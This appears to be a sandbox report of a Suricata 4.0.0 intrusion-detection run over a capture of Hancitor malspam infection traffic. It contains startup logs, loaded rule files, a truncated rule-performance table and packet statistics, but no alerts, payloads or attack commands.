Filename: 2018-09-04-Hancitor-malspam-infection-traffic.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etopen-all
Runtime: 9.6578681469 seconds
Hash: 90a60290858e08e0e9d5f7a4d55e5dab
Uploaded: 1550829391

Logfiles


suricata-report-2019-02-22-T-09-56-41-01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap.txt (18146 bytes)
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etopen/suricata400-etopen-all.yaml -l /var/www/html/90a60290858e08e0e9d5f7a4d55e5dabd2a6d3ad9c956d904083161fa55f2f7a -r /var/pcap/01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap -vvv -k none
elapsedtime:8.744518
stderr:
stdout:
22/2/2019 -- 09:56:32 - <Info> - Configuration node 'rule-files' redefined.
22/2/2019 -- 09:56:32 - <Notice> - This is Suricata version 4.0.0 RELEASE
22/2/2019 -- 09:56:32 - <Info> - CPUs/cores online: 1
22/2/2019 -- 09:56:32 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 33078 and 'request-body-inspect-window' set to 17091 after randomization.
22/2/2019 -- 09:56:32 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 33401 and 'response-body-inspect-window' set to 16619 after randomization.
22/2/2019 -- 09:56:32 - <Config> - DNS request flood protection level: 500
22/2/2019 -- 09:56:32 - <Config> - DNS per flow memcap (state-memcap): 524288
22/2/2019 -- 09:56:32 - <Config> - DNS global memcap: 16777216
22/2/2019 -- 09:56:32 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
22/2/2019 -- 09:56:32 - <Config> - preallocated 1000 hosts of size 136
22/2/2019 -- 09:56:32 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
22/2/2019 -- 09:56:32 - <Config> - using magic-file /usr/share/file/magic
22/2/2019 -- 09:56:32 - <Config> - Core dump size is unlimited.
22/2/2019 -- 09:56:32 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
22/2/2019 -- 09:56:32 - <Config> - preallocated 1000 defrag trackers of size 168
22/2/2019 -- 09:56:32 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
22/2/2019 -- 09:56:32 - <Config> - stream "prealloc-sessions": 2048 (per thread)
22/2/2019 -- 09:56:32 - <Config> - stream "memcap": 33554432
22/2/2019 -- 09:56:32 - <Config> - stream "midstream" session pickups: disabled
22/2/2019 -- 09:56:32 - <Config> - stream "async-oneside": disabled
22/2/2019 -- 09:56:32 - <Config> - stream "checksum-validation": disabled
22/2/2019 -- 09:56:32 - <Config> - stream."inline": disabled
22/2/2019 -- 09:56:32 - <Config> - stream "bypass": disabled
22/2/2019 -- 09:56:32 - <Config> - stream "max-synack-queued": 5
22/2/2019 -- 09:56:32 - <Config> - stream.reassembly "memcap": 134217728
22/2/2019 -- 09:56:32 - <Config> - stream.reassembly "depth": 0
22/2/2019 -- 09:56:32 - <Config> - stream.reassembly "toserver-chunk-size": 2651
22/2/2019 -- 09:56:32 - <Config> - stream.reassembly "toclient-chunk-size": 2596
22/2/2019 -- 09:56:32 - <Config> - stream.reassembly.raw: enabled
22/2/2019 -- 09:56:32 - <Config> - stream.reassembly "segment-prealloc": 2048
22/2/2019 -- 09:56:32 - <Config> - Delayed detect disabled
22/2/2019 -- 09:56:32 - <Config> - pattern matchers: MPM: ac, SPM: bm
22/2/2019 -- 09:56:32 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
22/2/2019 -- 09:56:32 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
22/2/2019 -- 09:56:32 - <Config> - prefilter engines: MPM
22/2/2019 -- 09:56:32 - <Config> - IP reputation disabled
22/2/2019 -- 09:56:32 - <Perf> - Registered 148 keyword profiling counters.
22/2/2019 -- 09:56:32 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-ftp.rules
22/2/2019 -- 09:56:32 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-policy.rules
22/2/2019 -- 09:56:32 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-trojan.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-games.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-pop3.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-user_agents.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-activex.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-rpc.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-attack_response.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-icmp.rules
22/2/2019 -- 09:56:33 - <Config> - No rules loaded from ET-emerging-icmp.rules.
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-scan.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-voip.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-chat.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-icmp_info.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-info.rules
22/2/2019 -- 09:56:33 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-shellcode.rules
22/2/2019 -- 09:56:34 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_client.rules
22/2/2019 -- 09:56:34 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-imap.rules
22/2/2019 -- 09:56:34 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_server.rules
22/2/2019 -- 09:56:34 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-current_events.rules
22/2/2019 -- 09:56:34 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-inappropriate.rules
22/2/2019 -- 09:56:34 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-smtp.rules
22/2/2019 -- 09:56:34 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_specific_apps.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-deleted.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-malware.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-snmp.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-worm.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-dns.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-misc.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-sql.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-dos.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-netbios.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-telnet.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-exploit.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-p2p.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-tftp.rules
22/2/2019 -- 09:56:36 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-mobile_malware.rules
22/2/2019 -- 09:56:37 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-botcc.rules
22/2/2019 -- 09:56:37 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-compromised.rules
22/2/2019 -- 09:56:37 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-drop.rules
22/2/2019 -- 09:56:37 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-dshield.rules
22/2/2019 -- 09:56:37 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-tor.rules
22/2/2019 -- 09:56:37 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-ciarmy.rules
22/2/2019 -- 09:56:37 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/local.rules
22/2/2019 -- 09:56:37 - <Config> - No rules loaded from local.rules.
22/2/2019 -- 09:56:37 - <Info> - 44 rule files processed. 18236 rules successfully loaded, 0 rules failed
22/2/2019 -- 09:56:37 - <Info> - Threshold config parsed: 0 rule(s) found
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for tcp-packet
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for tcp-stream
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for udp-packet
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for other-ip
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_uri
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_request_line
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_client_body
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_response_line
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_header
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_header
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_header_names
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_header_names
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_accept
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_accept_enc
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_accept_lang
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_referer
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_connection
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_content_len
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_content_len
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_content_type
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_content_type
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_protocol
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_protocol
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_start
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_start
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_raw_header
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_raw_header
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_method
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_cookie
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_cookie
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_raw_uri
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_user_agent
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_host
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_raw_host
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_stat_msg
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_stat_code
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for dns_query
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for tls_sni
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for tls_cert_issuer
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for tls_cert_subject
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for tls_cert_serial
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for dce_stub_data
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for dce_stub_data
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for ssh_protocol
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for ssh_protocol
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for ssh_software
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for ssh_software
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for file_data
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for file_data
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_request_line
22/2/2019 -- 09:56:37 - <Perf> - using shared mpm ctx' for http_response_line
22/2/2019 -- 09:56:37 - <Info> - 18241 signatures processed. 1175 are IP-only rules, 6125 are inspecting packet payload, 13172 inspect application layer, 0 are decoder event only
22/2/2019 -- 09:56:37 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
22/2/2019 -- 09:56:37 - <Perf> - TCP toserver: 41 port groups, 40 unique SGH's, 1 copies
22/2/2019 -- 09:56:37 - <Perf> - TCP toclient: 21 port groups, 21 unique SGH's, 0 copies
22/2/2019 -- 09:56:37 - <Perf> - UDP toserver: 41 port groups, 33 unique SGH's, 8 copies
22/2/2019 -- 09:56:37 - <Perf> - UDP toclient: 21 port groups, 15 unique SGH's, 6 copies
22/2/2019 -- 09:56:37 - <Perf> - OTHER toserver: 254 proto groups, 2 unique SGH's, 252 copies
22/2/2019 -- 09:56:37 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
22/2/2019 -- 09:56:38 - <Perf> - Unique rule groups: 111
22/2/2019 -- 09:56:38 - <Perf> - Builtin MPM "toserver TCP packet": 31
22/2/2019 -- 09:56:38 - <Perf> - Builtin MPM "toclient TCP packet": 20
22/2/2019 -- 09:56:38 - <Perf> - Builtin MPM "toserver TCP stream": 31
22/2/2019 -- 09:56:38 - <Perf> - Builtin MPM "toclient TCP stream": 21
22/2/2019 -- 09:56:38 - <Perf> - Builtin MPM "toserver UDP packet": 33
22/2/2019 -- 09:56:38 - <Perf> - Builtin MPM "toclient UDP packet": 15
22/2/2019 -- 09:56:38 - <Perf> - Builtin MPM "other IP packet": 2
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_uri": 8
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_request_line": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_client_body": 6
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient http_response_line": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_header": 6
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient http_header": 3
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_header_names": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_accept": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_referer": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_content_len": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_content_type": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient http_content_type": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_start": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_method": 3
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_cookie": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient http_cookie": 2
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_user_agent": 4
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver http_host": 2
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient http_stat_code": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver dns_query": 4
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver tls_sni": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toserver file_data": 1
22/2/2019 -- 09:56:38 - <Perf> - AppLayer MPM "toclient file_data": 5
22/2/2019 -- 09:56:39 - <Perf> - Registered 18241 rule profiling counters.
22/2/2019 -- 09:56:39 - <Info> - fast output device (regular) initialized: alert
22/2/2019 -- 09:56:39 - <Info> - eve-log output device (regular) initialized: eve.json
22/2/2019 -- 09:56:39 - <Config> - enabling 'eve-log' module 'alert'
22/2/2019 -- 09:56:39 - <Config> - enabling 'eve-log' module 'http'
22/2/2019 -- 09:56:39 - <Config> - enabling 'eve-log' module 'dns'
22/2/2019 -- 09:56:39 - <Config> - enabling 'eve-log' module 'tls'
22/2/2019 -- 09:56:39 - <Config> - enabling 'eve-log' module 'files'
22/2/2019 -- 09:56:39 - <Config> - enabling 'eve-log' module 'ssh'
22/2/2019 -- 09:56:39 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
This file has been truncated.


suricata-4.0.0-etopen-all-perf.txt-2019-02-22-T-09-56-41-01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap.txt (48982 bytes)
  --------------------------------------------------------------------------
  Date: 2/22/2019 -- 09:56:41. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2022547      1        1        20523329     7.12   737      0        18373403    27847.12    0.00        27847.12   
  2        2018452      1        15       6055735      2.10   2        0        5964801     3027867.50  0.00        3027867.50 
  3        2024778      1        1        5929037      2.06   84       0        5695016     70583.77    0.00        70583.77   
  4        2017552      1        6        11250855     3.90   393      0        5340401     28628.13    0.00        28628.13   
  5        2022627      1        12       29504800     10.24  162      0        568782      182128.40   0.00        182128.40  
  6        2022535      1        11       14369699     4.99   162      0        482230      88701.85    0.00        88701.85   
  7        2023476      1        5        16995729     5.90   162      0        478810      104911.91   0.00        104911.91  
  8        2021887      1        2        3096089      1.07   162      0        418162      19111.66    0.00        19111.66   
  9        2021863      1        3        3044973      1.06   162      0        408798      18796.13    0.00        18796.13   
  10       2020865      1        3        1442398      0.50   9        0        262480      160266.44   0.00        160266.44  
  11       2012612      1        16       1462194      0.51   63       0        194288      23209.43    0.00        23209.43   
  12       2012520      1        7        163033       0.06   1        1        163033      163033.00   163033.00   0.00       
  13       2024606      1        2        1363982      0.47   61       0        140195      22360.36    0.00        22360.36   
  14       2020855      1        3        3475716      1.21   64       0        137195      54308.06    0.00        54308.06   
  15       2021749      1        6        205964       0.07   2        0        136709      102982.00   0.00        102982.00  
  16       2024769      1        2        292654       0.10   3        0        114737      97551.33    0.00        97551.33   
  17       2023496      1        3        8079863      2.80   162      0        98116       49875.70    0.00        49875.70   
  18       2022050      1        3        96931        0.03   1        0        96931       96931.00    0.00        96931.00   
  19       2018457      1        1        5213136      1.81   164      0        93901       31787.41    0.00        31787.41   
  20       2021864      1        3        2731130      0.95   162      0        91840       16858.83    0.00        16858.83   
  21       2015877      1        6        1959180      0.68   61       0        89796       32117.70    0.00        32117.70   
  22       2024549      1        2        396972       0.14   6        0        84589       66162.00    0.00        66162.00   
  23       2022502      1        4        3262693      1.13   65       0        82792       50195.28    0.00        50195.28   
  24       2019094      1        5        2488578      0.86   63       0        82367       39501.24    0.00        39501.24   
  25       2018005      1        6        7272928      2.52   164      0        81134       44347.12    0.00        44347.12   
  26       2021896      1        2        2579474      0.89   162      0        80439       15922.68    0.00        15922.68   
  27       2019343      1        3        1826229      0.63   64       0        79861       28534.83    0.00        28534.83   
  28       2019707      1        2        316826       0.11   5        0        78683       63365.20    0.00        63365.20   
  29       2021902      1        2        2715622      0.94   162      0        75119       16763.10    0.00        16763.10   
  30       2024771      1        1        1984069      0.69   322      0        74630       6161.70     0.00        6161.70    
  31       2017259      1        12       2935928      1.02   59       0        74528       49761.49    0.00        49761.49   
  32       2023521      1        2        2645923      0.92   162      0        74480       16332.86    0.00        16332.86   
  33       2021038      1        4        1730961      0.60   59       0        74326       29338.32    0.00        29338.32   
  34       2019837      1        3        92484        0.03   8        1        72856       11560.50    72856.00    2804.00    
  35       2014411      1        11       138231       0.05   2        2        72410       69115.50    69115.50    0.00       
  36       2021413      1        2        2102278      0.73   61       0        70713       34463.57    0.00        34463.57   
  37       2021843      1        2        2737900      0.95   162      0        68841       16900.62    0.00        16900.62   
  38       2017748      1        6        277044       0.10   16       0        67410       17315.25    0.00        17315.25   
  39       2023405      1        2        2715937      0.94   162      0        67406       16765.04    0.00        16765.04   
  40       2017261      1        3        2436138      0.85   61       0        65531       39936.69    0.00        39936.69   
  41       2021868      1        2        2661394      0.92   162      0        64868       16428.36    0.00        16428.36   
  42       2022901      1        2        2471414      0.86   61       0        64466       40514.98    0.00        40514.98   
  43       2022609      1        2        1820231      0.63   63       0        63188       28892.56    0.00        28892.56   
  44       2013250      1        3        62654        0.02   1        0        62654       62654.00    0.00        62654.00   
  45       2009702      1        5        355686       0.12   24       0        62095       14820.25    0.00        14820.25   
  46       2025064      1        5        2462113      0.85   66       0        59788       37304.74    0.00        37304.74   
  47       2017948      1        2        2084197      0.72   63       0        58749       33082.49    0.00        33082.49   
  48       2014956      1        1        497406       0.17   34       0        58700       14629.59    0.00        14629.59   
  49       2012707      1        5        1474142      0.51   66       0        58101       22335.48    0.00        22335.48   
  50       2014701      1        12       342588       0.12   24       0        58036       14274.50    0.00        14274.50   
  51       2021897      1        2        2712582      0.94   162      0        57668       16744.33    0.00        16744.33   
  52       2009387      1        4        806454       0.28   229      0        56555       3521.63     0.00        3521.63    
  53       2024573      1        2        1279413      0.44   59       0        55752       21684.97    0.00        21684.97   
  54       2021308      1        2        1635232      0.57   59       0        54717       27715.80    0.00        27715.80   
  55       2021418      1        9        2424829      0.84   61       0        54299       39751.30    0.00        39751.30   
  56       2024178      1        2        75096        0.03   2        0        52150       37548.00    0.00        37548.00   
  57       2023168      1        2        2664957      0.92   162      0        52001       16450.35    0.00        16450.35   
  58       2018982      1        2        51199        0.02   1        0        51199       51199.00    0.00        51199.00   
  59       2020569      1        1        51191        0.02   1        0        51191       51191.00    0.00        51191.00   
  60       2016706      1        20       1304176      0.45   61       0        51028       21379.93    0.00        21379.93   
  61       2020781      1        5        88037        0.03   3        0        50989       29345.67    0.00        29345.67   
  62       2008306      1        3        971485       0.34   328      0        50289       2961.84     0.00        2961.84    
  63       2021888      1        2        2647743      0.92   162      0        49869       16344.09    0.00        16344.09   
  64       2014519      1        7        229578       0.08   10       0        49627       22957.80    0.00        22957.80   
  65       2021844      1        2        2702191      0.94   162      0        49307       16680.19    0.00        16680.19   
  66       2021631      1        2        1247782      0.43   59       0        48775       21148.85    0.00        21148.85   
  67       2016858      1        10       94911        0.03   2        0        47471       47455.50    0.00        47455.50   
  68       2021869      1        2        2672164      0.93   162      0        47143       16494.84    0.00        16494.84   
  69       2020181      1        8        2025633      0.70   61       0        46991       33207.10    0.00        33207.10   
  70       2023350      1        2        2576454      0.89   162      0        46898       15904.04    0.00        15904.04   
  71       2021950      1        2        2601177      0.90   162      0        46484       16056.65    0.00        16056.65   
  72       2023315      1        2        81056        0.03   2        0        46340       40528.00    0.00        40528.00   
  73       2022207      1        4        74312        0.03   2        0        45938       37156.00    0.00        37156.00   
  74       2024605      1        2        44971        0.02   1        0        44971       44971.00    0.00        44971.00   
  75       2024829      1        2        152231       0.05   6        0        44191       25371.83    0.00        25371.83   
  76       2021920      1        2        2616974      0.91   162      0        44040       16154.16    0.00        16154.16   
  77       2008438      1        20       43938        0.02   1        0        43938       43938.00    0.00        43938.00   
  78       2016537      1        2        4681680      1.62   327      0        43427       14317.06    0.00        14317.06   
  79       2022339      1        2        82502        0.03   2        0        43224       41251.00    0.00        41251.00   
  80       2025180      1        1        1213612      0.42   59       0        43215       20569.69    0.00        20569.69   
  81       2020708      1        2        1190684      0.41   59       0        42853       20181.08    0.00        20181.08   
  82       2022552      1        2        1833328      0.64   87       0        42820       21072.74    0.00        21072.74   
  83       2022959      1        2        2657632      0.92   162      0        41358       16405.14    0.00        16405.14   
  84       2023875      1        2        79869        0.03   2        0        40794       39934.50    0.00        39934.50   
  85       2103159      1        4        946799       0.33   326      0        40114       2904.29     0.00        2904.29    
  86       2023611      1        3        115265       0.04   4        0        40022       28816.25    0.00        28816.25   
  87       2021312      1        2        135761       0.05   8        0        39921       16970.12    0.00        16970.12   
  88       2019141      1        3        150195       0.05   4        0        39275       37548.75    0.00        37548.75   
  89       2020791      1        3        75848        0.03   3        0        39023       25282.67    0.00        25282.67   
  90       2014967      1        3        1269375      0.44   61       0        38993       20809.43    0.00        20809.43   
  91       2019165      1        3        135382       0.05   8        0        38824       16922.75    0.00        16922.75   
  92       2103158      1        6        1914724      0.66   653      0        38323       2932.20     0.00        2932.20    
  93       2019881      1        3        68336        0.02   2        0        38293       34168.00    0.00        34168.00   
  94       2023522      1        2        2655665      0.92   162      0        38252       16392.99    0.00        16392.99   
  95       2019345      1        2        768067       0.27   54       0        37674       14223.46    0.00        14223.46   
  96       2014380      1        4        2250411      0.78   122      0        37484       18445.99    0.00        18445.99   
  97       2018959      1        3        253861       0.09   8        0        37370       31732.62    0.00        31732.62   
  98       2018358      1        7        73695        0.03   2        0        37145       36847.50    0.00        36847.50   
  99       2014353      1        6        217586       0.08   8        0        36922       27198.25    0.00        27198.25   
  100      2100327      1        10       511287       0.18   165      0        36853       3098.71     0.00        3098.71    
  101      2020607      1        3        55885        0.02   2        0        36807       27942.50    0.00        27942.50   
  102      2024767      1        2        72111        0.03   2        0        36789       36055.50    0.00        36055.50   
  103      2021997      1        3        36351        0.01   1        1        36351       36351.00    36351.00    0.00       
  104      2021605      1        4        94838        0.03   4        0        36092       23709.50    0.00        23709.50   
  105      2020767      1        2        73771        0.03   3        0        36059       24590.33    0.00        24590.33   
  106      2018153      1        4        74717        0.03   3        0        35812       24905.67    0.00        24905.67   
  107      2022503      1        2        70225        0.02   2        0        35710       35112.50    0.00        35112.50   
  108      2022679      1        4        71097        0.02   2        0        35668       35548.50    0.00        35548.50   
  109      2018496      1        9        64559        0.02   2        0        35182       32279.50    0.00        32279.50   
  110      2024601      1        2        34834        0.01   1        0        34834       34834.00    0.00        34834.00   
  111      2009909      1        10       34394        0.01   1        0        34394       34394.00    0.00        34394.00   
  112      2009897      1        14       33873        0.01   1        0        33873       33873.00    0.00        33873.00   
  113      2021894      1        2        2542979      0.88   162      0        33848       15697.40    0.00        15697.40   
  114      2020421      1        2        130151       0.05   8        0        33694       16268.88    0.00        16268.88   
  115      2013441      1        9        33533        0.01   1        0        33533       33533.00    0.00        33533.00   
  116      2018013      1        3        52058        0.02   2        0        33279       26029.00    0.00        26029.00   
  117      2016809      1        5        1223847      0.42   61       0        32912       20063.07    0.00        20063.07   
  118      2020796      1        2        113817       0.04   5        0        32802       22763.40    0.00        22763.40   
  119      2017944      1        5        48810        0.02   2        0        32739       24405.00    0.00        24405.00   
  120      2015986      1        5        1829604      0.63   622      0        32506       2941.49     0.00        2941.49    
  121      2017901      1        5        1147212      0.40   59       0        31440       19444.27    0.00        19444.27   
  122      2023670      1        3        94920        0.03   4        2        31349       23730.00    16775.50    30684.50   
  123      2018055      1        3        30260        0.01   1        0        30260       30260.00    0.00        30260.00   
  124      2021921      1        2        2549385      0.88   162      0        30008       15736.94    0.00        15736.94   
  125      2011894      1        19       5

This file has been truncated.


packet_stats.log - (12789 bytes)
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6          5957          2887587      932400956     611998977       3645.7b   99.71
 IPv4      17            24          9638225      910048554     438537651         10.5b    0.29
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6          5957            66455       19064037        195800          1.2b   93.25
TMM_FLOWWORKER              IPv4      17            24           200817        9012513        932983         22.4m    1.79
TMM_RECEIVEPCAPFILE         IPv4       6          5791             2535        5327088          5346         31.0m    2.47
TMM_RECEIVEPCAPFILE         IPv4      17            24             2571          11068          3172         76.1k    0.01
